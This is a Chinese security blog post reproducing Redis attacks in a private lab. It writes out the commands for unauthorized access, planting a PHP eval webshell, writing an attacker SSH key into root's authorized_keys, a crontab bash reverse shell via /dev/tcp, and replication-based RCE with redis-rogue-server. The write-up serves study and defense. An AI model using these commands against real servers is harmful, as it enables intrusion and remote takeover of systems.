<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/1655090890230.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1655090890230.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":3,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Redis漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="[中间件漏洞复现]Redis漏洞">
<meta property="og:url" content="http://example.com/2022/11/08/Redis/index.html">
<meta property="og:site_name" content="Security">
<meta property="og:description" content="Redis漏洞">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/hZBIirR2WS6pkXT.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/EIpOLfbglvd2AR4.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/y1Xc9usjONren3Q.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/M4DKxnEkPovf6ep.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/ehMkn2Y3rF8qzS7.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/CYcf9MH5K8IGpTb.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/TZfnq9RH13t7dhs.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/dxBR3UnipGtDZ2J.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/slbRaXKnECjf8yt.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/EDdzUp2axQLZMJh.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/08/QRfkrPaAbNuVpnF.png">
<meta property="article:published_time" content="2022-11-08T12:04:02.749Z">
<meta property="article:modified_time" content="2022-11-08T12:17:21.059Z">
<meta property="article:author" content="l3ife">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/11/08/hZBIirR2WS6pkXT.png">

<link rel="canonical" href="http://example.com/2022/11/08/Redis/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>[中间件漏洞复现]Redis漏洞 | Security</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Security</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签<span class="badge">8</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类<span class="badge">4</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档<span class="badge">20</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/11/08/Redis/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="l3ife">
      <meta itemprop="description" content="谁想当安全混子呢">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Security">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [中间件漏洞复现]Redis漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-11-08 20:04:02 / 修改时间：20:17:21" itemprop="dateCreated datePublished" datetime="2022-11-08T20:04:02+08:00">2022-11-08</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          
            <div class="post-description">Redis漏洞</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="0x00-基础"><a href="#0x00-基础" class="headerlink" title="0x00 基础"></a>0x00 基础</h1><p>Redis是一个开源的、使用C语言编写的、支持网络交互的、可基于内存也可持久化的Key-Value数据库。默认端口为6379</p>
<p>在Centos7上安装</p>
<pre><code>wget http://download.redis.io/releases/redis-6.0.8.tar.gz
tar xzf redis-6.0.8.tar.gz
cd redis-6.0.8
make
cd src  切换到src
cp redis-cli /usr/bins
cp redis-server /usr/bin
</code></pre>
<p>渗透环境</p>
<pre><code>KAli  redis客户端攻击IP：192.168.50.246
Centos redis服务端IP:192.168.50.186
</code></pre>
<p>有关Redis主从复制的文章</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Cantevenl/article/details/115839649">https://blog.csdn.net/Cantevenl/article/details/115839649</a></p>
<h1 id="0x01-漏洞"><a href="#0x01-漏洞" class="headerlink" title="0x01 漏洞"></a>0x01 漏洞</h1><h2 id="1-未授权访问"><a href="#1-未授权访问" class="headerlink" title="1.未授权访问"></a>1.未授权访问</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>Redis默认情况，会绑定0.0.0.0:6379。如果没有采用相关的策略，如配置防火墙规则避免其他非信任来源的IP访问，就会将Redis服务暴露在公网；没有设置密码认证，会导致任意用户可以访问目标服务器下未授权访问Redis以及读取Redis数据。</p>
<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><p>在Centos7编辑Redis配置文件redis.conf，加上#，去掉IP绑定，允许除本地外的主机登录Redis服务</p>
<p><img src="https://s2.loli.net/2022/11/08/hZBIirR2WS6pkXT.png" alt="image.png"></p>
<p>修改protected-mode为no，关闭保护模式，允许远程连接Redis服务</p>
<p>在Centos7开启服务端 </p>
<pre><code>redis-server redis.conf
</code></pre>
<p>在Kali上使用客户端连接</p>
<p><img src="https://s2.loli.net/2022/11/08/EIpOLfbglvd2AR4.png" alt="image.png"></p>
<h2 id="2-写入Webshell"><a href="#2-写入Webshell" class="headerlink" title="2.写入Webshell"></a>2.写入Webshell</h2><h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><p>靶机的Redis存在<strong>未授权访问</strong>，前提如下：</p>
<pre><code>1.开启Web服务
2.Web目录路径
3.文件具有读写增删改查的权限
</code></pre>
<h3 id="复现-1"><a href="#复现-1" class="headerlink" title="复现"></a>复现</h3><p>写入Webshell</p>
<pre><code>192.168.50.186:6379&gt; config set dir /var/www/html
OK
192.168.50.186:6379&gt; config set dbfilename l5.php
OK
192.168.50.186:6379&gt; set webshell &quot;&lt;?php @eval($_POST[1]);?&gt;&quot;
OK
192.168.50.186:6379&gt; save
</code></pre>
<p>写入一句话</p>
<p><img src="https://s2.loli.net/2022/11/08/y1Xc9usjONren3Q.png" alt="image.png"></p>
<p>用蚁剑连接</p>
<p><img src="https://s2.loli.net/2022/11/08/M4DKxnEkPovf6ep.png" alt="image.png"></p>
<h2 id="3-密钥登录SSH"><a href="#3-密钥登录SSH" class="headerlink" title="3.密钥登录SSH"></a>3.密钥登录SSH</h2><h3 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h3><p>在数据库插入一条数据，将本机的公钥作为Value，key值随意，修改数据库的默认路径为&#x2F;root&#x2F;.ssh和默认的缓冲文件authorized.keys,在服务器端的&#x2F;root&#x2F;.ssh下生成一个授权的key</p>
<h3 id="复现-2"><a href="#复现-2" class="headerlink" title="复现"></a>复现</h3><p>利用条件</p>
<pre><code>1.Redis和ssh对外开放
2.未授权状态
3.可以通过key登录
</code></pre>
<p>Kali创建ssh-rsa密钥</p>
<p><img src="https://s2.loli.net/2022/11/08/ehMkn2Y3rF8qzS7.png" alt="image.png"></p>
<p>将公钥导入key.txt并写入</p>
<pre><code>(echo -e &quot;\n\n&quot;;cat id_rsa.pub;echo -e &quot;\n\n&quot;) &gt; key.txt
</code></pre>
<p><img src="https://s2.loli.net/2022/11/08/CYcf9MH5K8IGpTb.png" alt="image.png"></p>
<p>设置路径和保存的文件，将内存变量导入磁盘文件</p>
<pre><code>config set dir /root/.ssh
config set dbfilename authorized_keys
save
</code></pre>
<p><img src="https://s2.loli.net/2022/11/08/TZfnq9RH13t7dhs.png" alt="image.png"></p>
<p>Kali用ssh连接靶机</p>
<p><img src="https://s2.loli.net/2022/11/08/dxBR3UnipGtDZ2J.png" alt="image.png"></p>
<h2 id="4-crontab反弹shell"><a href="#4-crontab反弹shell" class="headerlink" title="4.crontab反弹shell"></a>4.crontab反弹shell</h2><h3 id="原理-3"><a href="#原理-3" class="headerlink" title="原理"></a>原理</h3><h3 id="复现-3"><a href="#复现-3" class="headerlink" title="复现"></a>复现</h3><pre><code>192.168.50.186:6379&gt; set xx &quot;\n*****bash -i &gt;&amp; /dev/tcp/192.168.50.186/9999 0&gt;&amp;1\n&quot;
192.168.50.186:6379&gt; config set dir /var/spool/cron
192.168.50.186:6379&gt; config set dbfilename root
192.168.50.186:6379&gt; save
</code></pre>
<p>并在kali上监听9999（不过后续没有完成）</p>
<h2 id="5-远程主从复制RCE"><a href="#5-远程主从复制RCE" class="headerlink" title="5.远程主从复制RCE"></a>5.远程主从复制RCE</h2><h3 id="原理-4"><a href="#原理-4" class="headerlink" title="原理"></a>原理</h3><p>主从模式就是指使用一个redis实例作为主机，其他实例都作为备份机，其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式</p>
<p><strong>影响范围：</strong></p>
<p>在Redis的4.X和5.X版本皆可使用</p>
<h3 id="复现-4"><a href="#复现-4" class="headerlink" title="复现"></a>复现</h3><p>下载Redis-rogue-server</p>
<p><img src="https://s2.loli.net/2022/11/08/slbRaXKnECjf8yt.png" alt="image.png"></p>
<p>运行脚本后i为交互式shell,r为反弹shell</p>
<p><img src="https://s2.loli.net/2022/11/08/EDdzUp2axQLZMJh.png" alt="image.png"></p>
<p>反弹shell如下，根据提示输入Ip，与监听的端口</p>
<p><img src="https://s2.loli.net/2022/11/08/QRfkrPaAbNuVpnF.png" alt="image.png"></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>l3ife
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2022/11/08/Redis/" title="[中间件漏洞复现]Redis漏洞">http://example.com/2022/11/08/Redis/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag"># 漏洞复现</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/11/08/xhcms/" rel="prev" title="[代码审计]熊海cms v1.0整站审计">
      <i class="fa fa-chevron-left"></i> [代码审计]熊海cms v1.0整站审计
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/11/08/weblogic/" rel="next" title="[中间件漏洞复现]Weblogic漏洞">
      [中间件漏洞复现]Weblogic漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-%E5%9F%BA%E7%A1%80"><span class="nav-number">1.</span> <span class="nav-text">0x00 基础</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.</span> <span class="nav-text">0x01 漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE"><span class="nav-number">2.1.</span> <span class="nav-text">1.未授权访问</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">2.1.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.1.2.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E5%86%99%E5%85%A5Webshell"><span class="nav-number">2.2.</span> <span class="nav-text">2.写入Webshell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-1"><span class="nav-number">2.2.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-1"><span class="nav-number">2.2.2.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E5%AF%86%E9%92%A5%E7%99%BB%E5%BD%95SSH"><span class="nav-number">2.3.</span> <span class="nav-text">3.密钥登录SSH</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-2"><span class="nav-number">2.3.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-2"><span class="nav-number">2.3.2.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-crontab%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">2.4.</span> <span class="nav-text">4.crontab反弹shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-3"><span class="nav-number">2.4.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-3"><span class="nav-number">2.4.2.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-%E8%BF%9C%E7%A8%8B%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6RCE"><span class="nav-number">2.5.</span> <span class="nav-text">5.远程主从复制RCE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-4"><span class="nav-number">2.5.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0-4"><span class="nav-number">2.5.2.</span> <span class="nav-text">复现</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">l3ife</p>
  <div class="site-description" itemprop="description">谁想当安全混子呢</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
	  

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">l3ife</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
